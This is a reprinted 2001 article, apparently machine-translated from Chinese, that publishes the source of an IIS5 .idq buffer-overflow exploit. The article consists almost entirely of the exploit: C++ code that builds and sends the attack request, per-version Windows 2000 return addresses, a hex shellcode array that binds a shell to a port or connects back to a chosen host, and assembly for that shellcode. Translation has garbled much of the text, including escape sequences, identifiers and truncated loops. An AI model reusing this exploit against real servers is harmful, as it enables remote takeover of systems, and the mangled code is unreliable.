[Example] IIS5

IIS5_IDQ command line overflow program source code - Snake

Creation Time: 2001-07-31 Article Properties: Reprinted article Source: http://snake12.top263.net article Submit: Inburst (Inburst_AT_263.NET) Snake's IIS5_IDQ command line overflow program source code BY snake. 2001/7/31 IIS5_IDQ overflow. . . From the Internet, I also let him return to the Internet. File Structure: CPP file: Iisidqoverflow.cpp and Skshellcodefunc.cpp header file: Skshellcodefunc.h function file: wsastart.cpp and snakesocket.cpp wsastart.h snakesocket.h (this 4 files do not provide ... Because they implemented only WSAStart and socket features, you have to successfully compile this program, you must replace the code of the related WSAStart and socket feature. This declaration!) Intermediate file: IIS_IDQ.ASM - - Used to implement the file of shellcode data, when compiling, it is not necessary to compile, just generate ShellCode data in the middle. It has been overflow, the process processing: Create a process and bind a port.

This can also be used for other Windows overflows. File 1: Iisidqoverflow.cpp (main file) #include #include "snakesocket.h" #include "wsastart.h" #include "skshellcodefunc.h" // function predeclare.// need to obtain address information void GetNecesProcAddr (char * szInfo, int iMaxSize); // my shell code to generate the code .int Sk_Make_IIS5_IDQ_ShellCode (char * pszOutput, sYSTEM_TYPE SystemType, ConnectStruct * pConnectStruct, LPCTSTR lpszBindCmd); // declare Help .void showhelp () {INT i; printf ("Run Parameters: Operating System Type Destination Address Web Port 1 Overflow Listening Port / R / N"); Printf ("or: Operating System Type Destination Address Web Port 2 overflow connection IP overflow connection port / r / n "); Printf (" / r / n / r / n where the input command parameter is not input, then the default is: / "cmd.exe / c dir / ""); Printf ("/ r / n If 1, then new commands will be entered."); Printf ("/ R / N / R / N support operating system type: - - / r / n "); for (i = 0; I 0) {send (msocket, szbuff, Ilen, 0);} return (Ilen> 0)? True: false;} int main (int Arg, char * argv []) {cwsastart wsastart; csnakesocket snakesocket; Word Word; DWORD DWIP; if (Argc> 1) {IF (stricmp (Argv [1], "getaddr") == 0) {char sztemp [12048]; GetnecesProcaddr SzTemp, SizeOf (SzTemp)); Printf ("% s / r / n", sztemp); osversioninfo osinfo; osventioninfo osinfo; osinfo.dwosveionsinfosize = sizeof (osversioninfo); getversionEx (& OSInfo); Printf ("Version:% D -% d. build:% d. id:% D / R / N [% s] / r / n ", Osinfo.dwmajorversion, Osinfo.dwminorversion, Osinfo.dwbuildNumber, Osinfo.dwplatformID, OSINFO.SZCSDVERSION; RETURN 0;}} IF (Argc <5) {Showhelp Return 0;} wsastart.startup (); system_type systemtype = (system_type) ATOI (Argv [1]); if (SystemType> = max_system_type_num) {Printf ("The operating system type is incorrect ./n"); Showhelp (); return 0;

} Dwip = snakesocket.getHostAddr (Argv [2]); if (dwip == 0) {printf ("Input Address is not right ./n"); return 0;} SK_CONNECTTYPE ConnectType; ConnectStructStruct; char Szcommand [129] = "cmd.exe / c dir c: //"; BOOL bInputCommand = false; connectType = (Sk_ConnectType) atoi (argv [4]); connectStruct.byConnectType = connectType; switch (connectType) {case LISTEN_ON_PORT: connectStruct.wListenPort = ATOI (Argv [5]); if (argc> = 7) {binputcommand = true;} Break; Case Connect_to_host: IF (Argc <6) {printf ("Parameter is not enough ./n"); Return 0; } connectStruct.dwConnectIP = snakeSocket.GetHostAddr (argv [5]); connectStruct.wConnectPort = atoi (argv [6]); if (argc> = 8) {bInputCommand = true;} break; default: printf ( "overflow type is not Correct ./R/N "); return 0;}}} {Printf (" / r / n Please enter the bound command: "); scanf ("% s ", szcommand;} snakesocket.createsocket ); WPORT = ATOI (Argv [3]); if (! Snakesocket.connect (argv [2], wport)) {printf ("Connection destination machine% S:% D failed ./R/N", Argv [2], WPORT; RETURN 0; Else Printf ("Connection destination machine% s:% d ok./r/N", Argv [2], WPORT); BOOL BVALUE = SendidqExPloit (SnakesoCket.m_socket, SystemType , & connectstruct, szcommand; if (BValue) {Printf ("Send Shellcode to% S:% D OK / R / N", Argv [2], WPORT); Printf ("Now, if the system type is correct, and the vulnerability exists So, you should get [% s] result ..., good luck.! ", Szcommand;} else {printf (" Send Failure, the other system type does not support / r / n ");} snakesocket.closesoSocket (); Rustart.cleanup (); return 0;} file 2. SKSHELLCODEFUNC.CPP (filed by SHELLCODEFUNC.CPP // SHELLCODEFUNC.CPP // SHELLCODE Function // Start by Snake. 2001/7/11 # include

#include "SkShellCodeFunc.h" // search JUMP_EBX address WORD Search_Jump_Ebx_Code (DWORD * dwArray, WORD wMaxCount); static const char szSystemName [MAX_SYSTEM_TYPE_NUM 1] [60] = { "IIS5 Chinese Win2k Sp0", "IIS5 Chinese Win2k Sp1 "" IIS5 Chinese Win2k SP2 "," IIS5 ENGLISH WIN2K SP1 "," IIS5 ENGLISH WIN2K SP2 "," IIS5 Japanese Win2k SP0 "," IIS5 Japanese Win2k SP1 "," --IS5 JAPANESE WIN2K SP2 "," IIS5 Mexico Win2k "," --iis5 Mexico Win2k SP1 "," IIS5 Mexico Win2k SP2 "," Unknown .. ",}; // Get a system name .lpctstr getSystemName (System_Type Type ) {if (type> MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM; return szSystemName [type];} typedef struct _Call_Func_Addr {DWORD dwGetModuleHandle; DWORD dwGetProcAddress; DWORD dwRetJmpEbxAddr;} Call_Func_Addr; // 2 address function (barrier address system has nowhere ) static const Call_Func_Addr AllSystemFuncAddr [MAX_SYSTEM_TYPE_NUM] = {{0x77e756db, 0x77e7564b, 0x77e4ac97}, // IIS5_WIN2K_CHINESE_SP0 {0x77e6380e, 0x77e67031, 0x77E4BF17}, // IIS5_WIN2K_CHINESE_SP1 {0x77e66c42, 0x77e69ac1, 0x77 e4ac97}, // IIS5_WIN2K_CHINESE_SP2 {0x77E956DB, 0x77E9564B, 0x77E6F533}, // IIS5_WIN2K_ENGLISH_SP0 {0x77E8380E, 0x77E87031, 0x77E6E52B}, // IIS5_WIN2K_ENGLISH_SP1 {0, 0}, // IIS5_WIN2K_ENGLISH_SP2 {0x77E656DB, 0x77E6564B, 0x77E3AF17}, // IIS5_WIN2K_JAPANESE_SP0, { 0x77E5380E, 0x77E57031, 0x77E3BCAF}, // IIS5_WIN2K_JAPANESE_SP1, {0, 0}, // IIS5_WIN2K_JAPANESE_SP2, {0x77E956DB, 0x77E9564B, 0x77E596D2}, // IIS_WIN2K_MEXICO_SP0, {0, 0, 0}, // IIS_WIN2K_MEXICO_SP0, {0, 0, 0}, // IIS_WIN2K_MEXICO_SP0,}; // The following #define code is analyzed from ISNO's article,

Thanks isno. # Define IIS5_IDQ_EXCEPTION_OFFSET 234 / * Exception Handler Offset * / Static Unsigned CHAR ForwardJump [] = "% U08EB"; / * This is a JMP 08H that covers an exception structure, which is used to jump to the number of SHELLCODE * / static unsigned char jump_to_shell [] = "% UC033% UB866% UC31F% U0340% U8BD8% U8B03" "% U6840% UDB33% U30B3% UC303% UE0FF"; / * Jump to shellcode, I explained the explanation of not a sentence If you are interested, you can see yourself, pay attention to each byte, the% UC033 becomes / x33 / xc0 after the conversion.

* / / The following data can bind the shell to a port, and listen to .char szsnakebindshellcode [] = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 " "/ X55 / XC0 / X40 / XC1 / XE0 / X0B / X2B / XE0 / XEB / X03 / X90 / XEB / X4E / XE8 / XF9 / XFF / XFF / XFF / X55 / X8B / XEC / X57 / X51 / X50 / X52 / X8B / X7D / X08 / X8B / X45 / X10 / X8B / X55 / X14 / XF2 / XAE / X67 / XE3 / X06 / X4F / X88 / X17 / X41 / XEB / XF5 / X5A / X58 / X59 / X5F / X51 / X52 / X33 / XD2 / X50 / X5B / XC1 / XEB / X10 / X50 / X59 / X80 / XFF / X01 / X74 / X02 / XFE / XCB / X8A / XC3 "" / X85 / XD2 / X75 / X08 / XC1 / XE0 / X08 / X51 / X5B / X59 / XEB / XEB / X5A / X59 / X5B / XC3 / XEB / X4F / X55 / X8B / XEC / X56 / X57 / X52 / X51 / X53 / X50 / X8B / X7D / X08 / X8B / X75 / X33 / XC9 / XB1 / X80 / X03 / XF1 / X8A / X0E / X46 / X51 / X8A / X1E / X46 / X56 / X8B / X45 / X10 / XFF / XD0 / XC9 / X8A / X0E / X46 / X51 / X8A / X1E / X46 / X50 / X56 / X56 / X50 / X8B / X4D / X14 / X07 / X83 / XC7 "" / X04 / X5E / X58 / X03 / XF3 / X59 / XE2 / XE7 / X59 / XE2 / XD3 / X58 / X5B / X59 / X5A / X5F / X5E / X5D / XC3 / XEB / X7C / X55 / XC0 / X66 / XB8 / XF0 / X03 / X2B / XE0 / X56 / X57 / X52 / X51 / X08 / X8D / XBD / XC0 / XFC / XFF / XFF / X33 / XC0 / XB0 / X02 / X46 / X54 / XFF / XD0 / X33 / XC0 / X50 / X40 / X50 / X40 / X50 / X8B / X46 / X38 / XFF / XD0 / X8B / X55 / X0C / X8D / X1A / X8A / X0B / X50 / X8D "" / XBD / X10 / XFF / XFF / XFF / X8D / X1F / X33 / XC0 / XB0 / X02 / X66 / x89 / x03 / x58 / x80 / ​​x01 / x75 / x69 / x50 / x50 / x8b / x42 / x04 / Xe8 / x31 / XFF / XFF / XFF / X8B / XC8 / X86 / XE9 / X58 / X8D / X5F / x02 / x8b / x55 / x0c / x33 / xc0 / x8d / x5f / x04 / x89 / x03 / x58 / x50 / x33 / xc9 / xb1 / x10 / x51 / x57 / x50 / x8b / x46 / X3C / XFF / XD0 / XEB / X02 / XEB / X4D / X58 / X50 / X33 / XC9 / X41 / X51 / X50 / X8B / X46 ""

/ X40 / XFF / XD0 / X58 / X50 / X33 / XC9 / XB1 / X10 / X8D / XBD / X40 / XFF / XFF / XFF / X89 / X0F / X57 / X8D / XBD / X10 / XFF / XFF / XFF / X57 / x50 / x8b / x46 / x44 / x52 / x8b / x46 / x58 / x53 / xd0 / x58 / x83 / xf8 / xff / x74 / x7a / x-x, x53 / x50 / x8b / x42 / X10 / XE8 / XC9 / XFE / XFF / XFF / X8B / XC8 / X86 / XE9 / X8D / X5F / X02 / XEB / X02 / XEB / X6A / X8B / X42 / X08 / XE8 / XB3 / XFE / XFF / XFF "/ x8b / xc8 / xc1 / xe1 / x10 / x8b / x42 / x0c / xe8 / xa6 / xfE / XFF / XFF / X66 / X8B / XC8 / X8D / X5F / X04 / X89 / X0B / x58 / x50 / x33 / x51 / x57 / x50 / x8b / x46 / x5c / xff / xd0 / x8b / xc8 / x58 / x67 / XE3 / X0B / X90 / X50 / x8b / x46 / x58 / XFF / XD0 / X33 / XC0 / XEB / X25 / X50 / X50 / X5A / X8D / XBD / X10 / XFF / XFF / XFF / X33 / XC0 / XB0 / X01 / X89 / X07 / XC1 / XE0 / X02 / X50 / x57 / x66 / x50 / x06 / x10 / x50 / x66 "" / x52 / x8b / x46 / x50 / XFF / XD0 / X58 / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X62 / X55 / XEB / XEC / X57 / X56 / X52 / X51 / X7D / X0C / X57 / X5A / X33 / XC0 / X8D / X7F / X24 / X57 / X33 / XC9 / XB1 / X44 / XF3 / XAA / X5F / X8D / X37 / XB1 / X44 / X89 / X0E / X8D / X77 / X2C / X66 / XB9 / X01 / X01 / X89 / X0E / X57 / X8D / X7F / x38 / x8d / x72 / x89 / x07 / x5f / x57 / x8d "" / x7f / x3c / x8d / x72 / x04 / x8b / x06 / x89 / x07 / x5f / x8b / x75 / x08 / x8b / x 46 / X30 / XC9 / X51 / X41 / X51 / X41 / X51 / X8D / X57 / X40 / X52 / X50 / X0C / X8D / X76 / X04 / X8B / X1E / X5E / XEB / X02 / XEB / X42 / X46 / X2C / XFF / XD0 / X33 / XC0 / X8B / X7D / X0C / X8D / X57 / X14 / X52 / X8D / X57 / X24 / X52 / X50 / x50 / x50 / x40 / x50 / x48 / x50 / x50 / x8b / x55 / x10 / x52 / x50 / x8b "" / x46 / x0c / xff / xd0 / x8b / x47 / x0c / x50 / x8b / x46 / X34 / XFF / XD0 / X8B / X47 / X04 / X34 / XFF / XD0 / X58 / X5B / X59 / X5A / X5E / X5F / X8B / XE5 / X5D / XC3 / XEB / X33 / X55 / X8B / XEC / X56 / X57 / X52 / X51 / X53 / X08 / X8B / X7D / X0C / X8B / X47 / X10 / X50 / X8B / X46 / X58 / XFF / XD0 / X8B / X07 / X50 / X8B / X46 / X34 / XFF / XD0 / X5B / X47 / X08 / X50 / X8B / X46 / X34 / XFF / XD0 / X58 / X5B / X59 ""

/ X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X77 / X55 / X8B / XEC / XB8 / XF0 / X02 / X2B / XE0 / X56 / X57 / X52 / X51 / X53 / x8b / x75 / x08 / x8b / x7d / x0c / x8d / x55 / x40 / x89 / x02 / x8d / x55 / xf8 / x8b / x02 / x85 / xc0 / x74 / x2a / x33 / xc0 / X50 / XB0 / XF0 / X50 / X8D / X85 / X08 / XFF / XFF / XFF / X50 / X8D / X5F / X10 / X8B / X03 / X50 / X8B / X46 / X4C / XFF / XD0 / X83 / XF8 / XFF / x75 / x0f / x50 "" / x5a / x8b / x46 / x28 / x28 / x27 / x74 / x28 / Xeb / x7f / x85 / xc0 / x20 / x7b / x7e / x20 / x33 / xd2 / x52 / x8d / x5d / xfc / x53 / x50 / x8d / x9d / x08 / x8b / x47 / x08 / x50 / x8b / x46 / x18 / xff / xd0 / x85 / xc0 / X74 / XEB / XEB / X02 / XEB / X62 / X33 / XC0 / X50 / X8D / X55 / XFC / X52 / X50 / X50 / X50 / X8B / X46 / X10 / XFF / XD0 / X8B / x45 / x74 / x3b / x33 "" / xc0 / x50 / x8d / x55 / xfc / x52 / xb0 / xf0 / x50 / x8d / x95 / X08 / XFF / XFF / XFF / X52 / X8B / x07 / x50 / x8b / x46 / x1c / xc0 / x74 / x23 / x33 / xc0 / x50 / x8b / x45 / xfc / x50 / x8d / x95 / x08 / XFF / XFF / XFF / X52 / x8b / x47 / x10 / x50 / x8b / x46 / x48 / xff / xd0 / x83 / xf8 / XFF / X74 / X07 / XEB / XAC / XE9 / X4C / XFF / XFF / XFF / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X72 / X55 / X8B / XEC / X33 "" / XC0 / XB0 / XF0 / X2B / XE0 / X56 / X57 / X52 / X51 / X53 / X8B / X75 / X08 / x8b / x 7D / X0C / X33 / XDB / X8D / X7D / XF0 / X8D / X57 / X04 / X89 / X1A / X8D / X57 / X08 / X43 / X89 / X1A / X8D / X17 / XB3 / X0C / X89 / X1A / X33 / XDB / X57 / X53 / X57 / X8B / X7D / X0C / X8D / X57 / X04 / X89 / X1A / X52 / X8D / X17 / X52 / X8B / X46 / X04 / XFF / XD0 / X5F / X85 / XC0 / X74 / X1F / X33 / XDB / X53 / X57 / X8B / X7D / X0C / X8D / X57 / X08 / X52 / X8D / X57 "" "/ x0c / x89 / x1a / x52 / x8b / x46 / x04 / xff / xd0 / x85 / XC0 / X74 / X05 / X33 / XC0 / X40 / XEB / X05 / X33 / XC0 / XEB / X01 / X90 / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / X8D / X34 / X24 / X8B / X36 / X33 / XC9 / X66 / XB9 / XCC / X04 / X03 / XF1 / X8D / XBD / X30 / XFE / XFF / XFF / X57 / X66 / XB9 / XFA / X01 / XF3 / XA4 / X5F / X57 / X33 / XC9 / X51 / XB1 / X2B / X51 / X66 / XB9 / XE6 / X01 / X51 / X33 / XDB / XB3 / X14 / X03 / XFB / X57 ""

/ XE8 / XCC / XFB / XFF / XFF / X83 / XC9 / X10 / X33 / XDD / X01 / X8B / XF7 / X03 / XF1 / X8B / X46 / X04 / X50 / X8B / X06 / X50 / X57 / X8D / XB5 / X30 / XFD / XFF / XFF / X56 / XE8 / XF6 / XFB / XFF / XFF / X83 / XC4 / X10 / X5F / X57 / X56 / XE8 / X3C / XFC / XFF / XFF / X83 / XC4 / X08 / X85 / XC0 / X74 / X57 / X8D / XBD / X10 / XFC / XFF / XFF / X89 / X03 / X57 / X56 / XE8 / X16 / XFF / XFF / XFF / X83 / xc4 / x08 / x85 "" / xc0 / x74 / x3e / x8d / xbd / x30 / xfe / xff / xff / x33 / xc0 / xb0 / x14 / x03 / xf8 / x57 / x8d / XBD / X10 / XFC / XFF / XFF / X57 / X56 / XE8 / X3B / XFD / XFF / XFF / X83 / XC4 / X0C / X57 / XFE / XE8 / X0E / XFE / XFF / XFF / X83 / XC4 / X08 / X57 / X56 / XE8 / XCF / XFD / XFF / XFF / X83 / XC4 / X08 / X33 / XC0 / X50 / X8D / X02 / X50 / X8B / X06 / XFF / XD0 / X33 / XC0 / X50 / X8B / X46 / X24 / XFF / XD0 / XC3 / X8B / XE5 / X5D / X90 "" / X90 / X02 / XFF / XFF / X02 / X01 / X02 / X25 / X01 / XC0 / X01 / XA8 / X01 / x58 / x01 / x01 / x02 / x63 / x65 / x78 / x65 / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b "" / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x 2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X02 / X0E / X6B / X65 "" / x6c / x33 / x32 / x2e / x64 / x6c / x6c / x2b / x2b / x0e / X11 / x54 / x69 / x6e / x61 / x74 / x65 / x50 / x72 / x6f / x63 / x65 / x73 / x73 / x2b / x0b / x43 / x72 / x65 / x61 / x74 / x65 / X50 / x69 / x70 / x47 / x65 / x74 / x53 / x74 / x61 / x72 / x49 / x6e / x66 / x6f / x41 / x2b / x0f / x43 / x72 / X65 / X61 / X72 / X6F / X63 / X65 / X73 / X73 / X41 / X2B / X0E / X50 / X65 / X65 / X6B ""

/ X4E / X61 / X6D / X65 / X70 / X65 / X2B / X0C / X47 / X6C / X6F / X62 / X61 / X6C / X41 / X6C / X6C / X6F / X63 / X2B / X0B / X57 / x72 / x69 / x74 / x65 / x46 / x69 / x6c / x09 / x52 / x65 / x61 / x64 / x46 / x69 / x6c / x53 / x6c / x65 / x65 / x70 / x78 / x69 / x74 / x50 / x72 / x73 / x73 / x2b / x0e / x47 / x65 / x74 / x4c / x61 / x73 / x74 / x45 / x72 / x72 / x6f / x72 "" / x2b / x2b / x10 / x44 / x75 / x63 / x61 / x74 / x65 / x48 / x61 / x6e / x64 / x6c / x65 / x2b / x12 / x47 / x65 / x74 / x43 / x75 / x72 / x72 / x50 / x72 / x6f / x63 / x65 / x73 / x73 / x2b / x0c / x43 / x6c / x6f / x73 / x65 / x48 / x61 / x6e / x64 / x6c / x65 / x2b / x32 / x5f / x33 / x32 / x2e / x64 / x6c / x6c / x2b / x0b / x07 / x73 / x6f / x63 / x6b / x65 / x74 / x2b / x05 / x62 / x69 / x6e / x64 / x2b "" / x07 / x6c / x69 / x73 / x2b / x07 / x61 / x63 / x63 / x65 / x70 / x74 / x2b / x05 / x73 / x65 / x6e / x72 / x65 / x63 / x76 / x2b / x0b / x73 / x65 / x74 / x73 / x6f / x63 / x6b / x6f / x70 / x74 / x2b / x0b / x57 / x53 / x41 / x72 / x74 / x75 / x72 / x2b / x0c / x63 / x6c / x6f / x73 / x65 / x73 / x6f / x63 / x6b / x65 / x74 / x2b / x08 / x63 / X6F / X6E / X6E / X65 / X63 / X74 / X2B / X0C / X67 / X65 / X74 "" / x68 / x6f / x73 / x74 / x6e / x61 / x6d / x65 / x2b / x2b / x2b / x2b / x2b / x2b / x 2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / xdb / x56 / x-x2b / xdb / x56 / x-x2b / x77 / x4b / x56 / x-x7 / x77 / x00 " ; // my private information: static const char szSnakeSign [] = "snake_program_code_v2.0"; # define PREHEAD_NOP_SIZE 0x24 # define dwConnectType_Offset 1249 PREHEAD_NOP_SIZE # define dwListenPort_Offset 1253 PREHEAD_NOP_SIZE # define dwConnectIP1_Offset 1257 PREHEAD_NOP_SIZE # define dwConnectIP2_Offset 1261 PREHEAD_NOP_SIZE # define dwConnectPort_Offset 1265 PREHEAD_NOP_SIZE # define dwExecCommand_Offset 1269 PREHEAD_NOP_SIZE # define wExecCommandSize 128 # define dwGetModuleHandle_Offset 1746 PREHEAD_NOP_SIZE # define dwGetProcAddress_Offset 1750 PREHEAD_NOP_SIZEBYTE byReservedValue [] = {0, 0x0a, 0x0d} ;;

// Conversion Standard Word -> Snake Shellcode Reserve Value.; // This Byte == 0, 0x0a, 0x0d, then, the high is 2. Low 1.; // High is 1, the low position is unchanged .dword conveute_mansi_word_to_sk_long (Word wValue) {int iReservCount, i; WORD wTemp; DWORD dwRetValue = 0; BOOL bFirst = true; iReservCount = sizeof (byReservedValue) / sizeof (BYTE); while (1) {wTemp = wValue & 0xff00; wTemp >> = 8; for ( i = 0; I

case IIS5_WIN2K_JAPANESE_SP0: wSelectValue = IIS5_WIN2K_JAPANESE_SP0; break; case IIS5_WIN2K_JAPANESE_SP1: wSelectValue = IIS5_WIN2K_JAPANESE_SP1; break; case IIS5_WIN2K_JAPANESE_SP2: wSelectValue = IIS5_WIN2K_JAPANESE_SP2; break; case IIS_WIN2K_MEXICO_SP0: wSelectValue = IIS_WIN2K_MEXICO_SP0; break; case IIS_WIN2K_MEXICO_SP1: wSelectValue = IIS_WIN2K_MEXICO_SP1; break; case IIS_WIN2K_MEXICO_SP2: wSelectValue = IIS_WIN2K_MEXICO_SP2; break; default: break;} if (wSelectValue> = MAX_SYSTEM_TYPE_NUM) return 0; dwGetModuleHandle = AllSystemFuncAddr [wSelectValue] .dwGetModuleHandle; dwGetProcAddress = AllSystemFuncAddr [wSelectValue] .dwGetProcAddress; dwRetJmpEbx = AllSystemFuncAddr [wSelectValue] .dwRetJmpEbxAddr; if (dwGetModuleHandle = = 0) RETURN 0; MEMSET (SZBUF, 1, SIZEOF (SZBUF)); Memcpy (SZSNAKESIGN); P = & (SZBUF [IIS5_IDQ_EXCEPTION_OFFSET-2]); WSPrintf (p, "% s" , forwardjump); P = Strlen ((char *) Forwardjump ); * P = 1; * p = 'u'; WSPrintf (p, "% 04x", (dwretjmpebx >> 0) & 0xfff); p = 4; * p = ' % '; * P =' u '; WSPrintf (p, "% 04x", (dwretjmpebx >> 16) & 0xfff); P = 4; * p = 1; WSPrintf (p, "% s", jump_to_shell ); // wsprintf (szoutput, "get /n.idq?%S=b http / 1.0 / r / nshell:% S / R / N / R / N", SZBUF, SZMYCODE); WSPRINTF (Szoutput, "Get /N.IDQ?%S=b http / 1.0 / r / nsnake: ", szbuf); Memcpy (Szcreatecode, SzsnakeBindshellcode, sizeof (szsnakebindshellcode);

// address information, port information writing shellcode of DWORD * pdw, dwTemp; WORD wTemp; char * lpsz, szExecTemp [wExecCommandSize]; // Init Value switch (pConnectStruct-> byConnectType) {case LISTEN_ON_PORT:.. SzCreateCode [dwConnectType_Offset ] = LISTEN_ON_PORT; dwTemp = Convert_Ansi_Word_To_Sk_Long (pConnectStruct-> wListenPort); lpsz = & (szCreateCode [dwListenPort_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp; // set listen port break; case CONNECT_TO_HOST:. szCreateCode [ dwConnectType_Offset] = CONNECT_TO_HOST; wTemp = (WORD) ((pConnectStruct-> dwConnectIP) & 0xffff); dwTemp = Convert_Ansi_Word_To_Sk_Long (wTemp); lpsz = & (szCreateCode [dwConnectIP2_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp ;. // set IP1 wTemp = (WORD) (((pConnectStruct-> dwConnectIP) & 0xffff0000) >> 16); dwTemp = Convert_Ansi_Word_To_Sk_Long (wTemp); lpsz = & (szCreateCode [dwConnectIP1_Offset]); pdw = (DWORD *) LPSZ; * PDW = dwtemp; // set ip2. dwtemp = communication_nsi_word_to_sk_long (PConn ectStruct-> wConnectPort); lpsz = & (szCreateCode [dwConnectPort_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp; // set connect Port break; default:. return 0;} lpsz = & (szCreateCode [dwGetModuleHandle_Offset ]); pdw = (DWORD *) lpsz; * pdw = dwGetModuleHandle; // set dwGetModuleHandle lpsz = & (szCreateCode [dwGetProcAddress_Offset]);. pdw = (DWORD *) lpsz; * pdw = dwGetProcAddress; // set dwGetProcAddress memset. (szexectemp, ' ', wexeccommandsize; wtemp = strlen (lpszbindcmd); if (wtemp> = wexeccommandsize) wtemp = wexeccommandsize-1;

strncpy (szExecTemp, lpszBindCmd, wTemp); lpsz = & (szCreateCode [dwExecCommand_Offset]); memcpy (lpsz, szExecTemp, wExecCommandSize); strcat (szOutput, szCreateCode); strcat (szOutput, "/ r / n / r / n") ; strcpy (pszOutput, szOutput); return strlen (pszOutput);} // address information needed to achieve void GetNecesProcAddr (char * szInfo, int iMaxSize) {HANDLE hModule = GetModuleHandle ( "kernel32"); DWORD dwAddr_GetHandle, dwAddr_GetProcAddr; char szOutput [ 11024], SZJMPADDR [8124], SZONE [20]; DWORD DWJMPEBX [100]; Word WgetjmpCount, W; WgetjmpCount = Search_jump_ebx_code (dwjmpebx, 100); SzjmpAddr [0] = 0; for (w = 0; w = wmaxcount) Break ;

} PValue ;} return wCount;} file 3. SkShellCodeFunc.h - must header files //SkShellCodeFunc.h// header file for shellcode defined function // start by snake 2001/7/11 # ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11 # define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11enum. sYSTEM_TYPE {IIS5_WIN2K_CHINESE_SP0, IIS5_WIN2K_CHINESE_SP1, IIS5_WIN2K_CHINESE_SP2, IIS5_WIN2K_ENGLISH_SP0, IIS5_WIN2K_ENGLISH_SP1, IIS5_WIN2K_ENGLISH_SP2, IIS5_WIN2K_JAPANESE_SP0, IIS5_WIN2K_JAPANESE_SP1, IIS5_WIN2K_JAPANESE_SP2, IIS_WIN2K_MEXICO_SP0, IIS_WIN2K_MEXICO_SP1, IIS_WIN2K_MEXICO_SP2, MAX_SYSTEM_TYPE_NUM,}; enum Sk_ConnectType {CONNECTTYPE_NONE = 0, LISTEN_ON_PORT = 1, CONNECT_TO_HOST, MAX_CONNECT_TYPE}; typedef struct _ConnectStruct { BYTE byConnectType; WORD wListenPort; DWORD dwConnectIP; WORD wConnectPort;} ConnectStruct; // get a system name .LPCTSTR GetSystemName (sYSTEM_TYPE type); # endif // _ SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11 file 4.iis_idq.asm --shellcode assembly code (not compiled Need); // IIS5_IDQ.ASM .386p .Model flat, c; // Define connection information below Structure .stconnectinfo struct byconnecttype db 0; // = 1, listening; = 2, linking external IP / port. ByRESERV1 DB 1; // Nothing Just for Word Adjusted. DWRESERV1 DW 1; // Nothing Just for Word Adjusted. Dwlistenport DD 0; // DDWORD DWIP1 DWIP2; DWIP1 DD 0; // // IP and port, one use 2 bits. High position is type, low as value. DWIP2 DD 0; // 1. High = 1, low position ordinary value dwConnectPort dd 0; // 2. high = 2, should be low = value -1stConnectInfo ends; // use the function configuration SkOverflowFuncAddr struct TerminateProcess dd 0; CreatePipe dd 0; GetStartupInfoA dd 0; CreateProcessA dd 0; PeekNamedPipe dd 0; GlobalAlloc DD 0; WriteFile DD 0; ReadFile DD 0; Sleep DD 0; EXITPROCESS DD 0; GetLasTerror DD 0; DuplicateHandle DD 0; GetCurrentProcess DD 0;

CloseHandle dd 0; socket dd 0; bind dd 0; listen dd 0; accept dd 0; send dd 0; recv dd 0; setsockopt dd 0; WSAStartup dd 0; closesocket dd 0; connect dd 0; gethostname dd 0; SkOverflowFuncAddr endsSTARTUPINFO struct cb dd 0; lpReserved dd 0; lpDesktop dd 0; lpTitle dd 0; dwX dd 0; dwY dd 0; dwXSize dd 0; dwYSize dd 0; dwXCountChars dd 0; dwYCountChars dd 0; dwFillAttribute dd 0; dwFlags dd 0; wShowWindow dw 0; cbReserved2 dw 0; lpReserved2 dd 0; hStdInput dd 0; hStdOutput dd 0; hStdError dd 0; STARTUPINFO endsPROCESS_INFORMATION struct hProcess dd 0; hThread dd 0; dwProcessId dd 0; dwThreadId dd 0; PROCESS_INFORMATION ends;; // sleeve - interactive command structure Shell_Cmd_Pipe struct hReadPipe dd 0; ShellStdoutPipe dd 0; hWritePipe dd 0; ShellStdinPipe dd 0; msocket dd 0; ProcessInformation PROCESS_INFORMATION <>; nstartupinfo STARTUPINFO <>; Shell_Cmd_Pipe endsSIZE_OF_TEMP_BUFF ER equ 0f0h; // accept write data shroud structure .Recv_Write_Socket_Pipe_Data struct szTemp db SIZE_OF_TEMP_BUFFER dup (0) dwBreak DD 0 dwTemp DD 0Recv_Write_Socket_Pipe_Data ends; SOCKADDR_IN struct sin_family dw 0; sin_port dw 0; sin_addr dd 0; sin_zero db 8 dup ( 0); SOCKADDR_IN endsSECURITY_ATTRIBUTES struct nLength DD 0; lpSecurityDescriptor DD 0; bInheritHandle DD 0; SECURITY_ATTRIBUTES ends; FUNC_PARAM_1 equ [ebp 8] FUNC_PARAM_2 equ [ebp 0ch] FUNC_PARAM_3 equ [ebp 10h] FUNC_PARAM_4 equ [ebp 14h] FUNC_PARAM_5 EQU [EBP 18H] FUNC_PARAM_6 EQU [EBP 1CH] FUNC_PARAM_7 EQU [EBP 20H] SO_RCVTIMEO EQU 